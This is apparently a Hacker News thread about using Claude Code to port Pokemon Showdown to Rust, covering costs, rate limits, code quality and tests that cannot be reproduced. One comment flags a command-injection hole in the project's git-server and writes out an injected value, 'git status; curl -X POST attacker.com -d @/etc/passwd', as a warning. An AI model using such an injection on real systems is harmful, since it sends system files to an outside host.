    The author just did a massive AI slop generation and assumes the codes works because it compiles and some equivalent output tests worked. All that was proved here is that by wasting a month of time you can individually rewrite a bunch of functions in a language you don't know if you already know how to program and it will compile. This has been known for 2-3 years now.

    This is just AI propaganda or resume padding. Nothing was ported or done here.

    Sorry what I meant to say is AI is revolutionary and changing the world for the better................................

    • starvit35 2 days ago ago

      no you're right, i find it wild you're the only comment in this thread calling this out

      this project is just a literal waste of energy

  • timcobb 3 days ago ago

    How much does it cost to run Claude Code 24 hrs/day like this. Does the $200/month plan hold up? My spend on Cursor has been high... I'm wondering if I can just collapse it into a 200/month CC subscription.

    • alecco 3 days ago ago

      This guy tested it: https://she-llac.com/claude-limits

      "Suspiciously precise floats, or, how I got Claude's real limits" 19hs ago 25 points https://news.ycombinator.com/item?id=46756742

      OTOH, with ChatGPT/Codex limits are less of a problem, in general.

      • esafak 3 days ago ago

        Because Codex effectively rate limits you by being so slow.

        • elcritch 2 days ago ago

          It’s slower but generally spits out more reliable code, IMHO.

          • timcobb a day ago ago

            Not in my experience recently. Are you using it via Cursor, or how?

    • vidarh 3 days ago ago

      If you're using it 24h/day you probably will run into it unless you're very careful about managing context and/or the requests are punctuated by long-running tool use (e.g. time-consuming test suites).

      I'm on the $200/month plan, and I do have Claude running unattended for hours at a time. I have hit the weekly limits at times of particularly aggressive use (multiple sessions in parallel for hours at a time) but since it's involved more than one session at the time, I'm not really sure how close I got to the equivalent of one session 24/7.

      • pigeonhole123 3 days ago ago

        How do you prompt it so it can run many hours at a time? Or do you run it in some kind of loop that you manage yourself?

        • vidarh 2 days ago ago

          Make it write a plan or todo list, and then make it spawn sub agents to execute. If you have the main agent do the work it will soon go off plan and stop, but when it's just spawning agents, it will be willing to run for a very long time.

          Also take care to tell it what it should solve itself rather than stop and ask you for help with, and run it contained so you can turn on yolo mode.

        • Rumudiez 3 days ago ago

          if you do enough planning up front, you can get a swarm of agents to run for hours on end completing all the tasks autonomously. I have a test project that uses github issues as a kanban board, I iterate with the primary chat interface to refine a local ROADMAP.md file and then tell it "get started"

          it took several sessions of this to refine the workflow docs to something claude + subagents would stick to regarding branching strategy and integration requirements, but it runs well enough. my main bottleneck now is CI, but I still hit the weekly limit on claude max from just a handful of these sessions each week, and it's about all the spare time I have for manual QA anyway

    • kvdveer 3 days ago ago

      There's a daily token limit. While I've never run into that limit while operating Claude as a human, I have received warnings that I'm getting close. I imagine that an unattended setup will blow through the token limit in not too much time.

    • storystarling 3 days ago ago

      I built a similar autonomous loop using LangGraph for a publishing backend and the raw API costs were significantly higher than $200. The subscription model likely has opaque usage limits that trigger fairly quickly under that kind of load. For a bootstrapped setup I usually find the predictability of the API bill worth the premium over hitting a black box limit.

    • tom1337 3 days ago ago

      I have no first-hand experience with the Max subscription (which the $200 plan is) but having read a few discussions here and on GitHub [1] it seems that Anthropic has tanked the usage limits in the last few weeks and thus I would argue that you would run into limits pretty quick if you using it (unsupervised) for 24h each day.

      1) https://github.com/anthropics/claude-code/issues/16157

      • hombre_fatal 3 days ago ago

        The employee in that thread claims that they didn't change the rate limits and when they look into it, it's usually noob error.

        It's a really low quality github issue thread. People making claims with zero data, just vibes, yet it's trivial to get the data to back the claims.

        The guy who responds to the employee even claims that his "lawyer is already on the case" in some lame threat.

        I wonder how many of these people had 30 MCP servers installed using 150k of their 200k context in every prompt.

        • tom1337 2 days ago ago

          Yea there are some weird replies in that thread. My few highlights were "This is my livelihood, not a hobby or sideproject" or "I just purchased a third $200 MAX plan and instantly hit rate limits". While I agree that it might not be Anthropics fault I've gotta admit that I found Anthropic to be rather vague regarding their rate limits. They seem to have totally dynamic rate limits based on usage and not a fixed "messages per hour" or "tokens per hour" based approach. Their free tier usage page states "Also, the number of messages you can send will vary based on demand, and we may impose other types of usage limits to ensure fair access to all users." [1] while the Pro plan page just says "During peak hours, the Pro plan offers at least five times the usage per session compared to our free service." [2] and Max then 5x or 20x it depending on the price you pay. If they just have more demand or reduced the free tier rate limit, all plans have a reduced limit and it will be totally within their communication. OpenAI at least gives you a specific amount of messages per timeframe (which I find more transparent). [4]

          1) https://support.claude.com/en/articles/8602283-about-free-cl... 2) https://support.claude.com/en/articles/8324991-about-claude-... 3) https://support.claude.com/en/articles/11014257-about-claude... 4) https://help.openai.com/en/articles/11909943-gpt-52-in-chatg...

  • lend000 3 days ago ago

    This seems like one of the best possible use cases for LLMs -- porting old, useful Python/Javascript into faster compiled language code. Something I don't want to do, that requires the type of intelligence that most people agree AI already has (following clear objectives, not needing much creativity or agency).

  • sebstefan 3 days ago ago

    >I've tried asking Claude to optimize it further, it created a plan that looks reasonable (I've never interacted with Rust in my life) and it spent a day building many of these optimizations but at the end of the day, none of them actually improved the runtime and some even made it way worse.

    This is the kind of thing where if this was a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling

    • lelandfe 3 days ago ago

      Yeah, I had Claude spend a lot of time optimizing a JS bundling config (as a quite senior frontend) and it started some things that looked insanely promising, which a newer FE dev would be thrilled about.

      I later realized it sped up the metric I'd asked about (build time) at the cost of all users downloading like 100x the amount of JS.

      • cies 3 days ago ago

        This is what LLMs are good at, generate what "look[s] insanely promising" to us humans

    • jtbayly 3 days ago ago

      I just ran into the problem of extremely slow uploads in an app I was working on. Told Gemini to work on it, and it tried to get the timing of everything, then tried to optimize the slow parts of the code. After a long time, there might have been some improvements, but the basic problem remained: 5-10 seconds to upload an image from the same machine. Increasing the chunk size fixed the problem immediately.

      Even though the other optimizations might have been ok, some of them made things more complicated, so I reverted all of them.

  • dicroce 3 days ago ago

    This is actually pretty incredible. Cannot really argue against the productivity in this case.

    • mythical_39 3 days ago ago

      one possible argument against the productivity is if the mirgration introduced too many bugs to be useable.

      In which case the code produced has zero value, resulting in a wasted month.

    • Sharlin 3 days ago ago

      I suppose what’s impressive is that (with the author’s help) it did ultimately get the port to work, in spite of all the caveats described by the author that make Claude sound like a really bad programmer. The code is likely terrible, and the 3.5x speedup way low compared to what it could be, but I guess these days we’re supposed to be impressed by quantity rather than quality.

      • 3 days ago ago
        [deleted]
    • citizenpaul 3 days ago ago

      Its not. The project does not work or actually implement anything. It just compiles and passes some arbitrary tests the author wrote.

      • woeirua 3 days ago ago

        We must have a different definition of arbitrary. OP ran 2.3 million tests comparing random battles against the original implementation? Which is probably what you or I would do if we were given this task without an LLM.

        • citizenpaul 2 days ago ago

          Well I cloned the repo and cannot generate this battle test by following the instructions. It appears a file called dex.js that is required is not present among other things as well as other suspicious wrong things for what appears to be on the surface a well organized project.

          I'm very suspicious of such projects so take it for what you will, but I don't have time to debug some toy project so if it was presented as complete but the instructions don't work it's a red flag for the increasingly AI slop internet to me. I'm saying I think they may have used one simple trick called lying.

  • zakhio 2 days ago ago

    This reminded of me porting low-level JS library and its tests (~10k loc) to Java about 6 months ago (so mostly it was Sonnet 4)

    My goal was to have 1:1 port, so later I can easily port newer commits from original repo. It wasn’t smooth, but it the end it worked

    Findings:

    * simple prompt like port everything didn’t work as Sonnet was falling into the loop of trying to fix code that it couldn’t understand, so at the end it just deleted that part :))

    * I had to switch to file by file basis, focus Claude on the base code then move to files that use the base code

    * Sonnet had some problems of following 1:1 instruction, I saw missing parts of functions, missing comments, even simple instruction to follow same order of functions in the file (had to tell explicitly to list functions in the file and then create separate TODO to port each)

  • mktemp-d 3 days ago ago

    For typing “yes” or “y” automatically into command prompts without interacting, you could have utilized the command ‘yes’ and piped it into the process you’re running as a first attempt to solving the yes problem. https://man7.org/linux/man-pages/man1/yes.1.html

    • rvz 3 days ago ago

      I don't think this is an actual problem and the prompt is there for a reason.

      Piping 'yes' to command prompts just to auto-approve any change isn't really a good idea, especially when the code / script can be malicious.

      • thunfischbrot 3 days ago ago

        And here I was hoping OP was being sarcastic. Yet it‘s reasonable we‘re nearing an AI-fueled Homer drinking bird scenario.

        Some concepts people try out using AI (for lack of a more specific word) are interesting. They will add to our collective understanding of when these tools, paired with meaningful methods can be used to effectively achieve what seemed out of reach before.

        Unfortunately it comes with many rediscovering insights I thought we already had, badly. Others use tools without giving consideration to what they were looking to accomplish, and how they would know if they did.

      • ehutch79 3 days ago ago

        Isn't that the point of vibe coding? You don't even look at the code. Just trust the llm to take the wheel.

        https://x.com/karpathy/status/1886192184808149383?lang=en

  • amelius 3 days ago ago

    I'm hoping that one day we can use AI to port the millions of lines in the modules of the Python ecosystem to a GIL-free version of Python.

  • ericol 3 days ago ago

    I recently had to create a MySQL shim for upgrading a large PHP codebase that currently is running in version 5.6 (Don't ask)

    The way I aimed at it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:

    1. Extract already existing test suit [1] from the original PHP extensions repo (All .phpt files)

    2. Get Claude to iterate over the results of the tests while building the code

    3. Extract my complete list of functions called and fill the gaps

    3. Profit?

    When I finally got to test the shim, the fact that it ran in the first run was rather emotional.

    [1] My shim fails quite a lot of tests, but all of them are cosmetics (E.g., no warning for deprecation) rather than functional.

  • DeathArrow 3 days ago ago

    This gives me hope that some people will use AI to port Javascript desktop apps to faster languages.

  • _pdp_ 3 days ago ago

    To be honest I think it should be the other way around.

    Typescript is a good high-level language that is versatile and well generated by LLMs and there is a good support for various linters and other code support tools. You can probably knock out more TS code then Rust and at faster rate (just my hypothesis). For most intents and purposes this will be fine but in case you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high level code to rust will be awesome actually and I can see how it could potentially be a dedicated agent of sorts.

  • Pbhaskal 2 days ago ago

    One thing I learned with porting is that one should have end to end integration test present to ensure no major functionality is broken.

  • kbmckenna 3 days ago ago

    Did you ever consider using something like Oh My Opencode [1]? I first saw it in the wake of Anthropic locking out Opencode. I haven’t used it but it appears to be better at running continuously until a task is finished. Wondering if anyone else has tried migrating a huge codebase like this.

    [1] https://github.com/code-yeongyu/oh-my-opencode

  • lasgawe 3 days ago ago

    At the current stage, the main issue is that when porting to a new language, some critical parts are missed. This increases the complexity of the codebase and leads to unnecessary code. In my personal opinion, creating a cross language compiler is a better approach than porting languages, while also focusing on squeezing performance.

  • dmix 2 days ago ago

    > For example, it created two different structures for what a move is in two different files so that they would both compile independently but didn't work when integrated together.

    This is the most annoying part of using LLMs blindly. The duplication.

  • aidos 2 days ago ago

    Let's hope Claude doesn't decide to run anything else through that git-server, since it's exec-ing whatever is posted over http.

    But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'

    https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...

    • narmiouh 2 days ago ago

      That's a good one.

      Seasoned developers who would not make such a mistake could also be lead to think the llm is writing safe code if they don't ever read it line by line.

      Vibe coders who are not seasoned developers, not sure if they would even know that this isn't safe code even if they read it line by line.

  • 2 days ago ago
    [deleted]
  • tmsacool 2 days ago ago

    Hey, even the README was vibe-coded!

    It probably works on his machine, but telling me to run it through Docker while not providing any Docker Files or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.

    Whatever, I'll just build it manually and run the test:

      cargo build --release 
      
      ./tests/test-unified.sh 1 100
    
      Running battles...
      Error response from daemon: No such container: pokemon-rust-dev
      Comparing results...
    
      =======================================
      Summary
      =======================================
      Total: 100
      Passed: 0
      Failed: 0
    
      ALL SEEDS PASSED!
    
    Yay! But wait, actually no? I mean 0 == 0 so thats cool.

    Oh the test script only works on a specificially named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them I guess. It will probably only take a minute

    JK, it took like 5 minutes, because it had to figure out Cargo/Rust version or sth I don't know :( So this better work or I've wasted my precious tokens!

    Ok so running cargo test inside the docker container just returns a bunch of errors:

      docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"
    
      error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
    
    Let's try the test script:

      ./tests/test-unified.sh 1 100
    
      Building release version...
       = note: `#[warn(dead_code)]` on by default
    
      warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
      warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
          Finished `release` profile [optimized] target(s) in 0.45s
    
      =======================================
      Unified Testing Seeds 1-100 (100 seeds)
      =======================================
    
      Running battles...
      Comparing results...
    
      =======================================
      Summary
      =======================================
      Total: 100
      Passed: 0
      Failed: 0
    
      ALL SEEDS PASSED!
    
    Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing.

    At this point I give up. I could not verify if this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes, if someone smarter than me figured it out please tell me how you got the tests to pass.

    • duskdozer 2 days ago ago

      Can't you read? It says "ALL SEEDS PASSED!" right there at the end!

      • omnicognate 2 days ago ago

        It also says "Passed: 0".

        I probably got wooshed here. Anyway, the tests definitely aren't run. I checked it out and tried myself. The test script [1] outputs "ALL SEEDS PASSED!" when the number of failures is zero, which of course is the case if the entire thing just fails to run.

        [1] https://github.com/vjeux/pokemon-showdown-rs/blob/605247d012...

        • duskdozer 2 days ago ago

          Yeah it was joking, but I'm...not totally convinced that couldn't have been the "tests passing" condition

  • RandomTeaParty 2 days ago ago

    How much did it cost?

  • 2 days ago ago
    [deleted]
  • skerit 3 days ago ago

    I've also done a few porting projects. It works great if you can do it file-per-file, class-per-class. Really have a similar structure in the target as the source. Porting _and_ improving or making small changes is a recipe for disaster

  • Mizza 3 days ago ago

    At this rate, I am expecting that an AI will be able to port the entire Linux kernel to Rust by the end of the year.

    • Curzel 3 days ago ago

      I don’t know about the Linux kernel, but I’ll be surprised if don’t have some “fully vibe coded OS” for Christmas (which would be cool to see)

  • seanclayton 2 days ago ago

    What are the known bugs?

  • gaigalas 2 days ago ago

    > requires my engineering expertise and constant babysitting

    What the skeptics have been saying all along.

  • mdavid626 3 days ago ago

    How you create the mental model of that Rust code?

    You’re just creating slop.

  • animanoir 2 days ago ago

    [dead]

  • FAFOAlex 2 days ago ago

    [flagged]

  • Imustaskforhelp 3 days ago ago

    Honestly I am really interested in trying to port the rust code to multiple languages like golang,zig, even niche languages like V-lang/Odin/nim etc.

    It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/

    I used gitingest on the repository that they provided and its around ~150k tokens

    Currently pasted it into the free gemini web and asked it to write it in golang and it said that line by line feels impossible but I have asked it to specifically write line by line so it would be interesting what the project becomes (I don't have many hopes with the free tier of gemini 3 pro but yeah, if someone has budget, then sure they should probably do it)

    Edit: Reached rate limits lmao